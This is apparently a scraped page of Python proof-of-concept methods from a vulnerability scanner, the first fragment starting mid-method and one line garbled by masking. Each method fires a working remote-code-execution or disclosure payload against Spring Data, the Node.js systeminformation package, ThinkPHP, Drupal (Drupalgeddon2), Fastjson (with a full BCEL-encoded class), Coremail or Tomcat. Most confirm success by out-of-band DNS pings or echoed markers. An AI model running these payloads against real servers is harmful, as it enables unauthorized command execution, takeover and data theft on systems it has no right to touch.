                                 "攻击者可构造包含有恶意代码的SPEL表达式实现远程代码攻击,直接获取服务器控制权限。"
     self.vul_info["cre_date"] = "2021-01-26"
     self.vul_info["cre_auth"] = "zhzyker"
     md = random_md5()[:-20]
     cmd = "ping " + md + "." + self.ceye_domain
     payload = 'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("' + cmd + '")]=&password=&repeatedPassword='******'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["vul_payd"] = payload
             self.vul_info[
                 "prt_info"] = "[ceye] [rce] [payload: " + payload + " ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #25
0
    def cve_2021_21315_poc(self):
        self.threadLock.acquire()
        self.vul_info["prt_name"] = "Node.JS: CVE-2021-21315"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info["vul_name"] = "Node.JS Command Injection"
        self.vul_info["vul_numb"] = "CVE-2021-21315"
        self.vul_info["vul_apps"] = "Node.JS"
        self.vul_info["vul_date"] = "2021-02-25"
        self.vul_info["vul_vers"] = "Systeminformation < 5.3.1"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "Command Injection"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "CVE-2021-21315 Node.JS OS sanitize service Parameters Command Injection"
        self.vul_info["cre_date"] = "2021-03-04"
        self.vul_info["cre_auth"] = "zhzyker"
        headers = {
            "User-agent": self.ua,
            "Connection": "close"
        }

        md = dns_request()
        cmd = "ping%20" + md
        payload = "/api/getServices?name[]=$(RECOMMAND)".replace("RECOMMAND", cmd)
        url = self.url + payload
        try:
            try:
                req = requests.get(url, headers=headers, timeout=3, verify=False)
                r = dump.dump_all(req).decode('utf-8', 'ignore')
            except:
                r = "null"
                pass
            if dns_result(md):
                self.vul_info["vul_data"] = r
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["vul_payd"] = payload
                self.vul_info["prt_info"] = "[dns] [payload:" + url + " ]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception as error:
            verify.error_print(self.vul_info["prt_name"])
        self.threadLock.release()
Exemple #26
0
 def cve_2018_20062_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "ThinkPHP: CVE-2018-20062"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = self.payload_cve_2018_20062.replace(
         "RECOMMAND", "whoami")
     self.vul_info["vul_name"] = "ThinkPHP5 5.0.23 远程代码执行漏洞"
     self.vul_info["vul_numb"] = "CVE-2018-20062"
     self.vul_info["vul_apps"] = "ThinkPHP"
     self.vul_info["vul_date"] = "2018-12-11"
     self.vul_info["vul_vers"] = "<= 5.0.23, 5.1.31"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "其5.0.23以前的版本中,获取method的方法中没有正确处理方法名," \
                                 "导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。"
     self.vul_info["cre_date"] = "2021-01-29"
     self.vul_info["cre_auth"] = "zhzyker"
     md = random_md5()
     cmd = "echo " + md
     self.payload = self.payload_cve_2018_20062.replace("RECOMMAND", cmd)
     self.path = "/index.php?s=captcha"
     self.method = "post"
     self.rawdata = "null"
     try:
         request = requests.post(self.url + self.path,
                                 data=self.payload,
                                 headers=self.headers,
                                 timeout=self.timeout,
                                 verify=False)
         if md in request.text:
             self.vul_info["vul_data"] = dump.dump_all(request).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as error:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #27
0
 def cve_2018_7600_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Drupal: CVE-2018-7600"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = self.payload_cve_2018_7600.replace(
         "RECOMMAND", "whoami")
     self.vul_info[
         "vul_name"] = "Drupal drupalgeddon2 remote code execution"
     self.vul_info["vul_numb"] = "CVE-2018-7600"
     self.vul_info["vul_apps"] = "Drupal"
     self.vul_info["vul_date"] = "2018-04-13"
     self.vul_info["vul_vers"] = "6.x, 7.x, 8.x"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "编号CVE-2018-7600 Drupal对表单请求内容未做严格过滤,因此,这使得攻击者可能将恶意注入表单内容" \
                                 ",此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。"
     self.vul_info["cre_date"] = "2021-01-29"
     self.vul_info["cre_auth"] = "zhzyker"
     md = random_md5()
     cmd = "echo " + md
     self.payload = self.payload_cve_2018_7600.replace("RECOMMAND", cmd)
     self.path = "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
     try:
         request = requests.post(self.url + self.path,
                                 data=self.payload,
                                 headers=self.headers,
                                 timeout=self.timeout,
                                 verify=False)
         if md in misinformation(request.text, md):
             self.vul_info["vul_data"] = dump.dump_all(request).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as error:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #28
0
 def fastjson_1224_3_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Fastjson: VER-1224-3"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞"
     self.vul_info["vul_numb"] = "CVE-2017-18349"
     self.vul_info["vul_apps"] = "Fastjson"
     self.vul_info["vul_date"] = "2017-03-15"
     self.vul_info["vul_vers"] = "<= 1.2.24"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "Fastjson中的parseObject允许远程攻击者通过精心制作的JSON请求执行任意代码"
     self.vul_info["cre_date"] = "2021-04-10"
     self.vul_info["cre_auth"] = "zhzyker"
     md = random_md5()
     cmd = "echo " + md
     headers = {
         'User-Agent': self.ua,
         'Content-Type': 'application/json',
         'cmd': cmd,
         'Connection': 'close'
     }
     data = '{{"@type": "com.alibaba.fastjson.JSONObject","x":{"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$cb$5b$TW$U$ff$5dH27$c3$m$g$40$Z$d1$wX5$a0$q$7d$d8V$81Zi$c4b$F$b4F$a5$f8j$t$c3$85$MLf$e2$cc$E$b1$ef$f7$c3$be$ec$a6$df$d7u$X$ae$ddD$bf$f6$d3$af$eb$$$ba$ea$b6$ab$ae$ba$ea$7fP$7bnf$C$89$d0$afeq$ee$bd$e7$fe$ce$ebw$ce$9d$f0$cb$df$3f$3e$Ap$I$df$aaHbX$c5$IF$a5x$9e$e3$a8$8a$Xp$8ccL$c1$8b$w$U$e4$U$iW1$8e$T$i$_qLp$9c$e4x$99$e3$94$bc$9b$e4$98$e2$98VpZ$o$cep$bc$c2qVE$k$e7Tt$e2$3c$c7$F$b9$cep$bc$ca1$cbqQ$G$bb$c4qY$c1$V$VW$f1$9a$U$af$ab0PP$b1$h$s$c7$9c$5c$85$U$f3$i$L$iE$F$96$82E$86$c4$a8$e5X$c1Q$86$d6$f4$c0$F$86X$ce$9d$T$M$j$93$96$p$a6$x$a5$82$f0$ce$Z$F$9b4$7c$d4$b4$pd$7b$3e0$cc$a5$v$a3$5c$bb$a2j$U$yQ$z$94$ac$C$9b$fc2$a8y$b7$e2$99$e2$84$r$z$3b$f2e$cfr$W$c6$cd$a2$9bY4$96$N$N$H1$a4$a0$a4$c1$81$ab$a1$8ck$M$a3$ae$b7$90$f1k$b8y$cf$u$89$eb$ae$b7$94$b9$$$K$Z$d3u$C$b1$Sd$3cq$ad$o$fc$ms6$5cs$a1z$c2$b5$e7$84$a7$c0$d3$e0$p$60$e8Z$QA$84$Y$L$C$cf$wT$C$e1S$G2l$d66$9c$85l$ce6$7c_C$F$cb$M$9b$d7$d4$a7$L$8b$c2$M$a8$O$N$d7$b1$c2p$ec$ff$e6$93$X$de$b2$bda$d0$b6Z$$$7e$d9u$7c$oA$5d$cb$8ca$a7$M$bc$92$f1C$db5$lup$92$c03$9e$V$I$aa$eb$86$ccto$b3A1$I$ca$99$J$S$cd$d1C$c3$Ja$Q$tM$d5$e5$DY$88$867$f0$s$f5$d9$y$cd1$u$ae$9fq$a80$Foix$h$efhx$X$ef$d1$e5$cc$c9i$N$ef$e3$D$86$96$acI$b0l$c1r$b2$7e$91$8eC$a6$86$P$f1$R$e9$q$z$81$ed0l$a9$85$a8$E$96$9d$cd$9b$86$e3$c8V$7c$ac$e1$T$7c$aa$e13$7c$ae$e0$a6$86$_$f0$a5l$f8W$e4$e1$f2$98$86$af$f1$8d$86$5b2T$7c$de$aeH$c7q$d3ve$d1$9dk$f9$8e$af$98$a2$iX$$$85$e85$ddRv$de$f0$83E$dfu$b2$cb$V$8a$b4$3aM$M$3dk6$9e$98$b7$a9$85$d9$v$R$U$5d$w$b0$f3$d2$e4$a3$E$8c4$91r$ae$e8$RS4$cdf$c5$f3$84$T$d4$cf$5d$e9$81$c9GQd$d9M$d4FSW$9b$a1I7$a4Yo$827$5cI$9b$N$_$a8M6mj$gjmz$7d$9e$eb$3c$8e$84$ad$ad$d7vl$D$9bK$ebl$g$bd4$b3C$ee$S$96$b3$ec$$$R$edG$g$7d$85$cf$a0$c9W$a4$gX$af$a2$feSN$c7$85i$h$9e$98$ab$e7$d6$ee$8b$60$cc4$85$ef$5b$b5$efF$y$7dQ$7eW$g$a7$f1$86$l$88R$f8$40$cexnYx$c1$N$86$7d$ff$c1$c3j$L$db$C$f7$7c$99$8cr$86$9c$9a$e6n$ad$82$b8$7c$a7$86$e5$Q$c1$bd$8d$8esE$c3$cb$cb$d7$e2$98bd$e0$o$Be$5b$c3Nt$ae$ef$e4H$7d$c6k$aa$b3$V$t$b0J$f5$c7$5c$3ft7$99Ej2$8c$89$VA$_$u$9d$de$60$Q$h$z$88$C$c9Vs$a8H$c9$b0$89B$9dt$ca$95$80$y$85A$acm$ab$87$b3$dcl$c3$F$99$f7$a47$bc$90$eck$V_$i$X$b6U$92$df$U$86$fd$ff$ceu$e3c$96E84$ef$e8$c3$B$fa$7d$91$7f$z$60$f2$ebM2C$a7$9d$b42Z$e3$83w$c1$ee$d0$86$nK2QS$s$c0$f1D$j$da$d2O$O$da$Ip$f5$kZ$aahM$c5$aa$88$9f$gL$rZ$efC$a9$82O$k$60$b4KV$a1NE$80$b6$Q$a0$d5$B$83$a9$f6h$3b$7d$e0$60$84$j$8e$N$adn$e3$91$dd$s$b2Ku$84$d0$cd$c3$89H$bbEjS1$d2$ce$b6$a6$3a$f3$f2J$d1$VJ$a2KO$84R$8f$d5$3dq$5d$d1$e3$EM$S$b4$9b$a0$ea$cf$e8$iN$s$ee$93TS$5b$efa$5b$V$3d$v$bd$8a$ed$df$p$a5$ab$S$a3$ab$b1To$fe6$3a$e4qG$ed$b8$93d$5cO$e6u$5e$c5c$a9$5d$8d$91u$k$3a$ff$J$bbg$ef$a1OW$ab$e8$afb$cf$5d$3c$9e$da$5b$c5$be$w$f6$cb$a03$a1e$3a$aaD$e7Qz$91$7e$60$9d$fe6b$a7$eeH$e6$d9$y$bb$8cAj$95$ec$85$83$5e$92IhP$b1$8d$3a$d0G$bb$n$b4$e306$n$87$OLc3f$b1$F$$R$b8I$ffR$dcB$X$beC7$7e$c0VP$a9x$80$k$fc$K$j$bfa$3b$7e$c7$O$fcAM$ff$T$bb$f0$Xv$b3$B$f4$b11$f4$b3Y$ec$a5$88$7b$d8$V$ec$c7$93$U$edY$c4$k$S$b8M$c1S$K$9eVp$a8$$$c3M$b8$7fF$n$i$da$k$c2$93s$a3$e099$3d$87k$pv$e4$l$3eQL$40E$J$A$A"}}: "x"}'
     try:
         request = requests.post(self.url, data=data, headers=headers, timeout=self.timeout, verify=False)
         if md in misinformation(request.text, md):
             self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
             self.vul_info["vul_payd"] = data
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["prt_info"] = "[rce] [spring] [cmd: " + cmd + "]"
             verify.scan_print(self.vul_info)
         else:
             verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #29
0
 def time_2021_0414_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "CoreMail: time-2021-0414"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info[
         "vul_name"] = "Coremail configuration information disclosure vulnerability"
     self.vul_info["vul_numb"] = "time-2021-0414"
     self.vul_info["vul_apps"] = "CoreMail"
     self.vul_info["vul_date"] = "2021-04-19"
     self.vul_info["vul_vers"] = "unknow"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "RCE"
     self.vul_info["vul_data"] = "null"
     self.vul_info[
         "vul_desc"] = "Coremail configuration information disclosure vulnerability"
     self.vul_info["cre_date"] = "2021-04-29"
     self.vul_info["cre_auth"] = "zhzyker"
     url = urljoin(self.url, "/mailsms/s?func=ADMIN:appState&dumpConfig=/")
     try:
         request = requests.get(url,
                                headers=self.headers,
                                timeout=self.timeout,
                                verify=False)
         if request.status_code == 200:
             if r"FS_IP_NOT_PERMITTED" not in request.text and r"/home/coremail" in request.text:
                 self.vul_info["vul_data"] = dump.dump_all(request).decode(
                     'utf-8', 'ignore')
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info[
                     "vul_payd"] = "/mailsms/s?func=ADMIN:appState&dumpConfig=/"
                 self.vul_info["prt_info"] = "[url:" + url + " ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as error:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #30
0
 def tomcat_examples_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Apache Tomcat: Examples File"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "/examples/servlets/servlet/SessionExample"
     self.vul_info["vul_name"] = "Apache Tomcat样例目录session操纵漏洞"
     self.vul_info["vul_numb"] = "null"
     self.vul_info["vul_apps"] = "Tomcat"
     self.vul_info["vul_date"] = "< 2015"
     self.vul_info["vul_vers"] = "all"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "Apache Tomcat默认安装包含”/examples”目录,里面存着众多的样例," \
                                 "其中session样例(/examples/servlets/servlet/SessionExample)允许用户对session进行操纵。" \
                                 "因为session是全局通用的,所以用户可以通过操纵session获取管理员权限。"
     self.vul_info["cre_date"] = "2021-01-21"
     self.vul_info["cre_auth"] = "zhzyker"
     self.payload = "/examples/servlets/servlet/SessionExample"
     try:
         self.request = requests.get(self.url + self.payload,
                                     headers=self.headers,
                                     timeout=self.timeout,
                                     verify=False)
         if self.request.status_code == 200 and r"Session ID:" in self.request.text:
             self.vul_info["vul_data"] = dump.dump_all(self.request).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info[
                 "prt_info"] = "[url: " + self.url + self.payload + " ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()